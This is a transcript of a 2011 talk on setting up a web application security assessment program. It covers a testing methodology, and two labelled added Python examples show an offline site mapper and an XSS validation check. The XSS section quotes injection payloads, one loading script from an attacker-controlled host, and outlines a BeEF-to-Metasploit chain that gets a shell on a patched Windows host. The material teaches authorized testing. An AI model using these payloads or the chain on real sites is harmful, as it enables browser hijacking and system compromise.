Developing Application Security Assessment Program

If you do not test your applications, someone else will!!

Joe Vest

on 26 May 2011


Transcript of Developing Application Security Assessment Program

Developing a Web Application Assessment Program
Joe Vest CISSP, CISA, CEH, GWAPT, GCFA
mrjoevest@gmail.com

WhiteHat Security Statistic Report: Window of Exposure - 2010

Recent Web Attacks
- eHarmony - SQL Injection: compromised DB being sold for $2,000 to $3,000
- NASDAQ - SQL Injection: malware planted on web portal
- .MIL, .GOV, .EDU - SQL Injection: full control of sites being sold
- PayPal / eBay - XSS: XSS can be leveraged to create very credible phishing attacks
- American Express - XSS: XSS supporting phishing attacks

A look back
- Security advice 5-10 years ago: Antivirus, Firewall, Patch management, SSL
- Security advice today: Antivirus, Firewall, Patch management, SSL and... maybe Intrusion Detection/Prevention, Vulnerability scanning
- What is missing?

Trust
Security is about... Antivirus, firewalls, patch management, etc. are put in place because of a lack of trust in the underlying systems' ability to protect themselves. Do you trust application developers to NOT create vulnerabilities?

- Most websites were exposed to at least one serious* vulnerability every day of 2010, or nearly so (9-12 months of the year). Only 16% of websites were vulnerable less than 30 days of the year overall.
- During 2010, the average website had 230 serious* vulnerabilities.
- In 2010, 64% of websites had at least one Information Leakage vulnerability, which overtook Cross-Site Scripting as the most prevalent vulnerability by a few tenths of a percent.

*Serious Vulnerabilities: Those vulnerabilities with a HIGH, CRITICAL, or URGENT severity as defined by PCI-DSS naming conventions. Exploitation could lead to breach or data loss.

"...statistical picture gleaned from over five years of vulnerability assessment results taken from over 3,000 websites across 400 organizations under WhiteHat Sentinel management."

Source: WhiteHat Website Security Statistic Report (Winter 2011, 11th Edition)

Go Hack Yourself
"You got that wrong, man. A good offense is the best defense."
"B.A., there's an old saying - 'The best defense is a good offense.'"

Where to Start?
The foundation of any web assessment should be:
- a solid understanding of the HTTP protocol
- understanding how to use a web browser and an interception proxy to examine and modify HTTP requests and responses

Fundamentally, a web application assessment involves:
- sending HTTP requests
- analyzing HTTP responses
- making decisions on what the application is doing
These decisions let the assessor craft and send modified HTTP requests to elicit a desired HTTP response.

Basic Assessment Strategy

Methodology - Key Features
- Use of a standard methodology
- Based on a defined framework
- Staff is knowledgeable of tools and techniques
- Defined process to perform the assessment
- Permission to test is given

Methodology
- Proven - the methodology is known and proven to work
- Repeatable - a test that demonstrates a vulnerability can be easily repeated; this reduces false positives
- Explainable - vulnerabilities must be clearly communicated, at multiple levels from the CEO to the developer

Assessment Framework
- Core of an assessment program
- Provides the base for a good methodology (Proven, Repeatable, Explainable)
- Defines the detail of coverage for an assessment and what will be tested (Injection, XSS, Authentication Mgt, CSRF, Logic Flaws, etc.)
- Based on existing rules and regulations
- Creates common ground that findings can be mapped to
- The framework should be flexible
- Provides common ground for technical and business groups by showing compliance

Process (5 stages)
- Define Scope
- Reconnaissance and Mapping
- Vulnerability Discovery
- Validation
- Reporting

Why an Application Assessment Program?
- Business must make risk decisions. A robust assessment program can provide information to bridge the gap between business and tech.
- Give application developers a framework that allows security to be part of an SDLC.
- Web applications are meant to be used. By nature, security controls are put in place to allow access to these applications.
- Web applications have become very complex. Can your application stand on its own to protect itself?
- If you do not test your applications, someone else will.
- Take an offensive role to better defend.

Penetration Test? Black box testing? Application Assessment? Vulnerability Assessment? Risk Assessment?

Manual vs. Automated
Do I perform automated or manual assessments? Yes.

Key Difference:
- Manual assessment - a person decides which actions to take based on the information gathered
- Automated assessment - a tool decides which actions to take based on the information gathered
Tools are great to use in an assessment, but they should not substitute for human decision making.

Define Scope
The scope of an assessment defines the deliverables, boundaries, and requirements. It shows what IS and IS NOT included in an assessment.

Reconnaissance and Mapping
During the Reconnaissance and Mapping stage, an understanding of the application is gained. This understanding provides the basis for the next stage (vulnerability discovery).
Reconnaissance involves reviewing and understanding an application before performing a vulnerability assessment. It includes a manual walkthrough of the application to understand how it should function normally. During reconnaissance, IP addresses and hostnames should be identified.
Mapping an application is the documenting of the application's logical layout and structure. Mapping includes:
- Spidering the application (manual and automated)
- Documentation of interesting paths and flows through the application
- Analyzing relationships between pages and sections of the site
- Documentation of session identifiers
Tools typically used in this stage are interception proxies, automatic spider tools, and manual browsing of the application. After reconnaissance and mapping, the assessor should have an understanding of the application, and vulnerability discovery can begin.
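The request/analyze/decide loop described under "Where to Start?" and the mapping checklist above, as an added example that is not part of the presentation: a small offline mapper that spiders a constructed in-memory site, records which pages link to which, notes the forms it finds, and documents the session identifiers the application hands out. The host name, paths and cookie names are all constructed for the example, and the `fetch` function stands in for a real HTTP request. Recording whether each cookie carries the HttpOnly and Secure attributes goes a step beyond the slides, but it is the kind of note an assessor wants in the map before vulnerability discovery starts.

```python
"""Added example (not from the presentation): an offline mapper for the
Reconnaissance and Mapping stage. Everything here is constructed; no
network traffic is generated."""
from html.parser import HTMLParser
from http.cookies import SimpleCookie
from urllib.parse import urljoin, urlparse

# Constructed fake application: path -> (response headers, HTML body)
FAKE_SITE = {
    "/": ({}, '<html><body><a href="/login">Login</a> <a href="/about.html">About</a>'
              '<a href="http://cdn.example.net/lib.js">cdn</a></body></html>'),
    "/login": ({"Set-Cookie": "JSESSIONID=abc123; Path=/; HttpOnly"},
               '<html><body><form action="/login" method="post">'
               '<input name="user"><input name="pass" type="password"></form>'
               '<a href="/account?id=1">Account</a></body></html>'),
    "/account": ({"Set-Cookie": "prefs=dark; Path=/"},
                 '<html><body><a href="/">Home</a><a href="/account?id=2">Next</a></body></html>'),
    "/about.html": ({}, "<html><body>About us</body></html>"),
}


class LinkParser(HTMLParser):
    """Collect anchor targets and form actions from one response body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.links.append(a["href"])
        elif tag == "form" and a.get("action"):
            self.forms.append((a.get("method", "get").upper(), a["action"]))


def fetch(base, path):
    """Stand-in for sending an HTTP request; returns (status, headers, body)."""
    if path in FAKE_SITE:
        headers, body = FAKE_SITE[path]
        return 200, headers, body
    return 404, {}, ""


def map_application(base="http://app.example.test", start="/"):
    """Breadth-first spider restricted to the in-scope host.

    Returns a dict with the pages seen (path -> status), the edges between
    them (page -> linked page), the forms found, and the session identifiers
    set by the application along with their cookie attributes."""
    host = urlparse(base).netloc
    site_map = {"pages": {}, "edges": [], "forms": [], "cookies": {}}
    queue = [start]
    while queue:
        path = queue.pop(0)
        if path in site_map["pages"]:
            continue                      # already visited
        status, headers, body = fetch(base, path)
        site_map["pages"][path] = status
        cookie_header = headers.get("Set-Cookie")
        if cookie_header:                 # document session identifiers
            jar = SimpleCookie(cookie_header)
            for name, morsel in jar.items():
                site_map["cookies"][name] = {
                    "set_by": path,
                    "httponly": bool(morsel["httponly"]),
                    "secure": bool(morsel["secure"]),
                }
        if status != 200:
            continue
        parser = LinkParser()
        parser.feed(body)
        for link in parser.links:
            parsed = urlparse(urljoin(base + path, link))
            if parsed.netloc != host:
                continue                  # out of scope: do not follow
            site_map["edges"].append((path, parsed.path))
            queue.append(parsed.path)
        for method, action in parser.forms:
            target = urlparse(urljoin(base + path, action)).path
            site_map["forms"].append((path, method, target))
    return site_map


if __name__ == "__main__":
    result = map_application()
    print("pages:", sorted(result["pages"]))
    print("edges:", result["edges"])
    print("forms:", result["forms"])
    print("cookies:", result["cookies"])
```

The scope restriction (`parsed.netloc != host`) is the mapper's counterpart of the Define Scope stage: links to the CDN host are recorded nowhere and never followed. Query strings are dropped from edges so that `/account?id=1` and `/account?id=2` map to the same page, which is what an assessor wants when documenting the logical layout rather than every parameter value.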
Vulnerability Discovery
The primary purpose of this phase is to identify potential vulnerabilities. Exploitation and validation will be done later.
The types of vulnerabilities, and how to test for each, are defined in the 'Application Assessment Vulnerability Framework'.
Vulnerability discovery includes:
- Manual review of source code to identify possible weaknesses
- Determining weaknesses throughout the site based on assessor experience, error messages, or other logic errors
- Identifying vulnerabilities based on the Application Assessment Framework
- Manual and automated tools assist with the identification of vulnerabilities
Tools typically used in this stage are interception proxies and web application vulnerability scanners.

Validation
During this stage, the vulnerabilities discovered are tested for validity. Validation is used to verify that a vulnerability is exploitable and to what extent. It reduces the false positives generated by automatic scanners. A severity and risk value for each validated vulnerability is assigned and documented in the final report.
Each vulnerability identified (through manual or automated means) is verified for exploitability using tools or techniques specific to that vulnerability:
- The vulnerability is exploited or shown to be a false positive
- The steps to exploit the vulnerability are documented
- A risk value of High, Medium, or Low is assigned to each vulnerability
- A severity rating based on the Application Assessment Framework is assigned

Reporting
Reporting involves documenting the complete assessment so that it can be read and understood at multiple levels (management, developer, project manager, and technical staff).
- Findings are documented in a standard report format
- List actionable items to be mitigated
- Short and to the point, with supplemental documents attached for reference

How to demonstrate the power of XSS
XSS is typically shown by displaying a JavaScript alert.
I have seen this reduce the impact and importance of mitigating XSS vulnerabilities.
Instead of a pop-up, how about...
- Playing a game on your site
- Fully compromising a client's system

Cross-Site Scripting - XSS
"Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites" - OWASP

XSS Demo 1, XSS Demo 2: Browser Exploitation Framework
BeEF is the Browser Exploitation Framework, a professional tool to demonstrate the real-time impact of XSS browser vulnerabilities. BeEF 'hooks' browsers and allows arbitrary commands to be executed in a hooked browser.

XSS Demo 3
Gain shell access on a fully patched Windows 7 box, running the Windows firewall and current AV, through an XSS vulnerability. Use BeEF to deliver a malicious Java application created by Metasploit that delivers a meterpreter payload and gains shell access.
Exploit: Java RMIConnectionImpl Deserialization Privilege Escalation Exploit (CVE-2010-0094)

Play a game inside a client's browser
Execute a JavaScript game in the client's browser. Injected XSS code:
<script src="http://myip/asteroids.js"></script>
The JavaScript is referenced from a location under the control of the attacker.

Basic XSS validation
Execute a JavaScript alert in the client's browser. Injected XSS code:
<script>alert('Hacked');</script>
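The basic validation above, and the Validation stage's goal of weeding out scanner false positives, as an added example that is not part of the presentation: a scanner flags a parameter because the input comes back in the page, and validation asks whether the characters a script would need actually survive output encoding. Rather than firing `alert()`, the check sends a unique marker followed by the HTML-significant characters and classifies how they are echoed. The two template functions are constructed stand-ins for a vulnerable page and the same page after output encoding is applied; the marker, the regular expression and the verdict strings are this example's own choices.

```python
"""Added example (not from the presentation): classify a reflected-input
finding as not reflected, reflected but encoded, or reflected raw, and
show the output-encoding fix beside the vulnerable template."""
import html
import re

# Constructed probe: a unique marker so the reflection can be located,
# followed by the characters that matter for breaking out of HTML text.
MARKER = "zq7probe"
PROBE_TAIL = "&<>\"'"
PROBE = MARKER + PROBE_TAIL

# Matches one HTML entity (named, decimal or hex) at the current position.
ENTITY = re.compile(r"&(#\d+|#x[0-9a-fA-F]+|[A-Za-z]+);")


def vulnerable_template(term):
    """Constructed 'before': the search term is echoed into HTML unencoded."""
    return f"<html><body><p>Results for {term}</p></body></html>"


def fixed_template(term):
    """Constructed 'after': the same page with output encoding applied."""
    return f"<html><body><p>Results for {html.escape(term, quote=True)}</p></body></html>"


def raw_specials(body, marker=MARKER, probe_tail=PROBE_TAIL):
    """Return the set of probe characters that came back unencoded right
    after the marker, or None when the marker is absent from the body."""
    idx = body.find(marker)
    if idx == -1:
        return None
    pos = idx + len(marker)
    raw = set()
    for expected in probe_tail:
        ent = ENTITY.match(body, pos)
        if ent:                                   # encoded as an entity
            pos = ent.end()
        elif pos < len(body) and body[pos] == expected:
            raw.add(expected)                     # came back verbatim
            pos += 1
        else:
            break                                 # reflection truncated or altered
    return raw


def validate_reflection(body):
    """Verdict for the assessor: ('not_reflected' | 'encoded' | 'unencoded',
    sorted list of characters reflected raw)."""
    raw = raw_specials(body)
    if raw is None:
        return "not_reflected", []
    if raw:
        return "unencoded", sorted(raw)
    return "encoded", []


if __name__ == "__main__":
    for name, template in (("vulnerable", vulnerable_template), ("fixed", fixed_template)):
        print(name, validate_reflection(template(PROBE)))
```

The "encoded" verdict is what turns a scanner hit into a documented false positive for an HTML text context; an "unencoded" verdict with `<` and `>` in the list is what justifies moving on to the alert or game demonstration, and the list of raw characters tells the developer exactly which encoding the fix must apply. A page that encodes `<` and `>` but leaves quotes raw still comes back "unencoded", which matters when the reflection lands inside an attribute rather than in text.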
XSS is a client-side attack that takes advantage of the trust between a browser and a site.

Web Hacking Incident Database (WHID)
http://webappsec.org/
LizaMoon Mass SQL Injection: ~500,000 pages hit (3-31-2011)

Upcoming Training
SANS Training coming to Huntsville: Assess Your Web Apps in Depth
What: SANS training (mentor program) - GIAC Web Application Penetration Tester
When: Tuesday, April 26, 2011 - Tuesday, June 28, 2011 (6:00PM-8:00PM)

Questions?